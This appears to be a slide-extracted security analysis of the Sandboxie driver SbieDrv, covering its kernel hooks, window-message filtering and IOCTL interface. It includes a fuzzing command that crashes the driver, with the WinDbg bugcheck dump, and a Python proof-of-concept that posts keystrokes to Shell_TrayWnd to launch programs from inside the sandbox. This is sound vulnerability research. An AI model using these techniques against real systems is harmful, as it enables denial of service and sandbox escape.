  • 6. It checks OS version and build number to calculate offsets to OpenProcedure into OBJECT_TYPE structure: —— If version < 4: If BuildNumber <= 1770h: O penProcedureO ffset = pTypeO bjHeader+30h+60h Else: O penProcedureO ffset = pTypeO bjHeader+30h+28h Else: If BuildNumber <= 1770h: O penProcedureO ffset = pTypeO bjHeader+30h+60h Else: O penProcedureO ffset = pTypeO bjHeader+34h+28h
  • 7. —— It creates a code block for the hook that will write into system memory. Surely the OS checks that OpenProcedure is pointing to OS memory, or KeBugCheck is called. The blocks used for hooking will check always if the current process is a sandboxed process, and it will deny the access in that case. Else, it will grant the access. This function that i called “ComprobarProcessIdEnListaDeSandboxeadosObtenerEstructura” searchs the current process in the list of sandboxed processes.
  • 8. In the next image we can see the code where SbieDrv will create the block code for hooks, and where it overwrite OpenProcedure with its pointer. 3.2. Ssdt and shadow ssdt hooks:
  • 9. Sandboxie hooks these apis: win32k_NtUserCallHwndParamLock win32k_NtUserDestroyWindow win32k_NtUserShowWindow win32k_NtUserSendInput win32k_NtUserBlockInput win32k_NtUserSystemParametersInfo win32k_NtUserSetSysColors win32k_NtUserSetSystemCursor win32k_NtUserMessageCall win32k_NtUserPostMessage win32k_NtUserPostThreadMessage win32k_NtUserSetWindowsHookEx win32k_NtUserSetWinEventHook nt_NtRequestPort nt_NtRequestWaitReplyPort nt_NtTraceEvent Most of them are related to controlling window messages from sandboxed applications. We are going to analyze the win32k_NtUserMessageCall hook: Hook_Win32k_Gestiona_MensajeDeVentana is a function that will performs checks over a window message sent by a sandboxed process to know if the message must be denied or not.
  • 10. -It gets the process id of the sender and the receiver of the message. If the process that will receive the message is sandboxed, the message is not denied. -If the message is 0x3e4 it’s not denied. -It gets the target window class name. SbieDrv has a list of window class names to be managed with some exceptions: TrayNotifyWnd SystemTray_Main Connections Tray MS_WebcheckMonitor PrintTray_Notify_WndClass CicLoaderWndClass CicMarshalWndClass Logitech Wingman Internal Message Router devldr CTouchPadSynchronizer Type32_Main_Window TForm_AshampooFirewall WinVNC desktopsink Afx:400000:0 NVIDIA TwinViewWindow Shell_TrayWnd It needs to add this exceptions to let some well known applications to run without problem into the sandbox: explorer, some navigators, etc…
  • 11. -If the target of the message is a non-sanboxed process, and the sender is a sandboxed process: a) If the target window class name is not a class of the previous list, the message is denied. b) If the target windows class name is in the list: 1. If message < WM_USER(0x400), this messages are denied: 2h – WM_DESTROY 0Bh – WM_SETREDRAW 10h – WM_CLOSE 11h – WM_QUERYENDSESSION 12h – WM_QUIT 16h – WM_ENDSESSION 3Bh – 4Eh – WM_NOTIFY 82h – WM_NCDESTROY 111h – WM_COMMAND 112h – WM_SYSCOMMAND 319h The other messages are granted. 2. If message > WM_USER, it depends of the window class name. For example, it will grant msg 0x4ec for Shell_trayWnd. 4. Io Controls:
  • 12. Sandboxie device is: deviceSandboxieDriverApi Io Controls must be: DeviceType = FILE_DEVICE_UNKNOWN = 0x00000022 Function = 0x801 Method= METHOD_NEITHER Access = 0 CTL_CODE(0x00000022, 0x801, METHOD_NEITHER, 0); User buffer has a 0x8 <= size <= 0x40 bytes. The first DWORD is always 0x123400XX. It is the id of the operation to perform. SbieDrv has a list with all ids associated with the function to manage them: 0x12340001: [0x12340001][XXXXXXXX][ptr memuser out] Query sandboxie version string. 0x12340002: [0x12340002][XXXXXXXX][XXXXXXXX][XXXXXXXX][ ptr memuser out] [XXXXXXXX][XXXXXXXX] [XXXXXXXX][XXXXXXXX] Query sandboxedprocesses list. 0x12340003:
  • 13. Write a file. 0x12340007: [0x12340007][XXXXXXXX][XXXXXXXX][XXXXXXXX][XXXXXXXX][XXXXXXXX][ptr memuser out] 0x12340008: [0x12340008][XXXXXXXX][XXXXXXXX][XXXXXXXX][XXXXXXXX][XXXXXXXX] [XXXXXXXX][XXXXXXXX] [XXXXXXXX][XXXXXXXX][ ptr memuser][XXXXXXXX][ptr memusr][XXXXXXXX][ptr memusr] 0x12340009: Get object frompid. 0x1234000a 0x1234000b: query info about a sandboxedprocess. 0x1234000c: Query systemtime. 0x1234000d: Unprotect user mode memory. [0x1234000D][XXXXXXXX][ptr funcion modo usuario][XXXXXXXX][ptr memoria usuario info hook] 0x1234000f: Query a sandbox option: DisableBoxedWinSxS InjectDll AutoExec OpenProtectedStorage OpenCredentials OpenWinClass NoRenameWinClass BoxNameTitle ClsidTrace OpenClsid StartService StartProgram AutoRecover RecoverFolder AutoRecoverIgnore 0x12340010: Ask to the driver to update with sandboxie.ini y templates.ini (The driver will parse ini files). 0x12340011 0x12340015 0x12340016: Ask the driver to hook ssdt andshadowssdt. 0x12340019 0x1234001e 0x1234001f: Relatedwith access to disk. 0x12340021 0x12340024 0x12340025 0x12340026 0x12340028 0x1234002b: Get process handle. 5. Sandboxie security: 5.1. Fuzzing Io Controls: Here is a simple fuzzing using Kartoffel (kartoffel.reversemode.com): FOR %%A IN (0 1 2) DO FOR %%B IN (0 1 2 3 4 5 6 7 8 9 A B C D E F) DO Kartoffel -d deviceSandboxieDriverApi -n 0x40 -o 0x40 -z 0x40 -Z0x40 -I 0x222007 -u CUSTOM,”[P=0x123400%%A%%B::*0][B=0x41::*0x3c$4][!!]” With this command line we sent Io Controls with size 0x40, and with id from 0x12340001 to 0x1234002f, with a buffer filled with ‘A’. [0x123400XX][AAAAAAAAAAAAAAAAAAAAAAA…] It is a really simple fuzzing, but it’s enough to get a bug check for 0x12340027 id:
  • 14. WINDBG>!analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* DRIVER_CORRUPTED_MMPOOL (d0) Arguments: Arg1: 6b757a74, memory referenced Arg2: 00123400, IRQL Arg3: 00000000, value 0 = readoperation, 1 = write operation Arg4: 12340027, address which referencedmemory An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is causedby drivers that have corruptedthe systempool. Run the driver verifier against any new(or suspect) drivers, andif that doesn’t turn up the culprit, then use gflags to enable special pool. You can also set HKLMSYSTEMCurrentControlSetControlSession ManagerMemory ManagementProtectNonPagedPool to a DWORD 1 value andreboot. Then the systemwill unmapfreednonpagedpool, preventing drivers (although not DMA-hardware) fromcorrupting the pool. Debugging Details: —————— ************************************************************************* *** *** *** *** *** Your debugger is not using the correct symbols *** *** *** *** In order for this commandto work properly, your symbol path *** *** must point to .pdbfiles that have full type information. *** *** *** *** Certain .pdbfiles (such as the public OS symbols) do not *** *** contain the requiredinformation. Contact the groupthat *** *** providedyou with these symbols if you needthis commandto *** *** work. *** *** *** *** Type referenced: kernel32!pNlsUserInfo *** *** *** ************************************************************************* ************************************************************************* *** *** *** *** *** Your debugger is not using the correct symbols *** *** *** *** In order for this commandto work properly, your symbol path *** *** must point to .pdbfiles that have full type information. *** *** *** *** Certain .pdbfiles (such as the public OS symbols) do not *** *** contain the requiredinformation. Contact the groupthat *** *** providedyou with these symbols if you needthis commandto *** *** work. *** *** *** *** Type referenced: kernel32!pNlsUserInfo *** *** *** ************************************************************************* READ_ADDRESS: 6b757a74 (kuzt -> tzuk -> el nombre del autor) CURRENT_IRQL: 123400 FAULTING_IP: +5c1952f0012c4f0 12340027 ?? ??? DEFAULT_BUCKET_ID: DRIVER_FAULT BUGCHECK_STR: 0xD0
  • 15. PROCESS_NAME: Kartoffel.exe LAST_CONTROL_TRANSFER: from804f7b27 to 8052716c STACK_TEXT: f7642750 804f7b27 00000003 f7642aac 00000000 nt!RtlpBreakWithStatusInstruction f764279c 804f8714 00000003 c0000005 00000000 nt!KiBugCheckDebugBreak+0x19 f7642b7c 804f8c3f 000000d0 6b757a74 00123400 nt!KeBugCheck2+0x574 f7642b9c f7cce31f 000000d0 6b757a74 00123400 nt!KeBugCheckEx+0x1b WARNING: Stack unwindinformation not available. Following frames may be wrong. f7642c34 804ee0ef 81740340 817398a0 806d12d0 SbieDrv+0x131f f7642c44 80574032 81739910 818b2b88 817398a0 nt!IopfCallDriver+0x31 f7642c58 80574ec1 81740340 817398a0 818b2b88 nt!IopSynchronousServiceTail+0x60 f7642d00 8056d81e 000007b4 00000000 00000000 nt!IopXxxControlFile+0x5e7 f7642d34 8053cbc8 000007b4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a f7642d34 7c91eb94 000007b4 00000000 00000000 nt!KiFastCallEntry+0xf8 0012eca4 7c91d8ef 7c8016be 000007b4 00000000 ntdll!KiFastSystemCallRet 0012eca8 7c8016be 000007b4 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc 0012ed08 0040617d000007b4 00222007 003b0808 kernel32!DeviceIoControl+0x78 0012fee4 0040a9cd0000000f 003b0b40 003b0c10 Kartoffel+0x617d 0012ffc0 7c816ff7 0000001a 00000000 7ffdd000 Kartoffel+0xa9cd 0012fff0 00000000 0040a85a 00000000 78746341 kernel32!BaseProcessStart+0x23 STACK_COMMAND: kb FOLLOWUP_IP: SbieDrv+131f f7cce31f 8bf7 movesi,edi SYMBOL_STACK_INDEX: 4 SYMBOL_NAME: SbieDrv+131f FOLLOWUP_NAME: MachineOwner MODULE_NAME: SbieDrv IMAGE_NAME: SbieDrv.sys DEBUG_FLR_IMAGE_TIMESTAMP: 4d8b29aa FAILURE_BUCKET_ID: 0xD0_SbieDrv+131f BUCKET_ID: 0xD0_SbieDrv+131f Followup: MachineOwner ——— Sorting ‘Functions window’… ok KeBugCheck is called from SbieDrv so it is only a non dangerous DoS (we can cause it from a sandboxed process), but we can see that a simple fuzzing causes a crash, and this fact makes me suspicious of Sandboxie robusticity. 5.2. Sending window messages to Shell_TrayWnd (excluded window): Shell_TrayWnd is a window class name that Sandboxie will give a special management. Sandboxie will let to send more window messages to these window class name from the sandboxed processes. The next script shows how these additional messages let us to launch application linked from the start menu from a sandboxed process: import random random.seed() VK_LEFT=0x25 VK_UP=0x26 VK_RIGHT=0x27 VK_DOWN=0x28 VK_RETURN=0x0d VK_TAB=0x09 VK_SHIFT=0x10
  • 16. VK_CONTROL=0x11 VK_MENU=0x12 import ctypes import time fromctypes.wintypes import DWORD, HWND, HANDLE, LPCWSTR, WPARAM, LPARAM, RECT, POINT trayRect=RECT(0,0,0,0) trayWindow= ctypes.windll.user32.FindWindowExA(0,0,”Shell_TrayWnd”,0) trayNotifyWindow= ctypes.windll.user32.FindWindowExA(trayWindow,0,”TrayNotifyWnd”,0) def PressKey(hwin,key): msgkeydown=0x100 msgkeyup=0x101 ctypes.windll.user32.PostMessageA(hwin, msgkeydown, key, 0) #KEYDOWN time.sleep(0.1) ctypes.windll.user32.PostMessageA(hwin, msgkeyup, key, 0) #KEYUP time.sleep(0.1) ctypes.windll.user32.PostMessageA(trayWindow, 0xa1, 1, 0x200020) #WM_NCLBUTTONDOWN ctypes.windll.user32.PostMessageA(trayWindow, 0xa2, 0, 0x200020) #WM_NCLBUTTONUP PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_RIGHT) PressKey(trayWindow, VK_RIGHT) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_RETURN) (The key pressed in this script will lauch calc.exe in my system, with the disposition of my start menu). This is not a high security risk but I think it is not the good behaviour for a sandbox. 5.3. Long names: Sandboxie have problems with long names (more than MAX_PATH and less than 32767 wide chars) because LoadImageNitifyRoutine image name param comes with NULL. I have not found security risks here but I have found some strange behaviours that will not appears if Sandboxie is not installed. This detail mades us to think it is risky to intercept so much things in kernel, and difficult to have in mind all possibilities and cases. 5.4. Complex formats parsing: From my point of view, Sandboxie has risky code in kernel. For example, SbieDrv LoadImageNotifyRoutine callback parses in depth PE Headers of the loaded image (directly in user mode).
  • 17. 0x12340010 io control opens and parses .ini files from kernel:
  • 18. SbieDrv disassembles instructions for hooking functions of kernel and user mode, to keep instructions at entry point of the function that will be overwritten. 5.5. Conclusion: From my point of view process isolation sandboxs have a intrinsic risk: -It is difficult to intercept all that sandboxed process should not have access. -It will introduce risky code in sensitive points of the system. -Hooks and changes to the system will depend of the system version and build, and lof of times they will be dirty and undocumented. -Surely you will need to add some exceptions in the way that Sandboxie does.
  • 19. -Specifically, Sandboxie has risky code in kernel: PE headers parsing, ini files parsing. My conclusion about Sandboxie is that it is a useful tool. I would run a navigator or a pdf reader sandboxed, to help to protect myself from vulnerabilities, but I wouldn’t run a malware to analyze its behaviour in Sandboxie, unless Sandboxie was running in vmware, bochs or other virtual machine.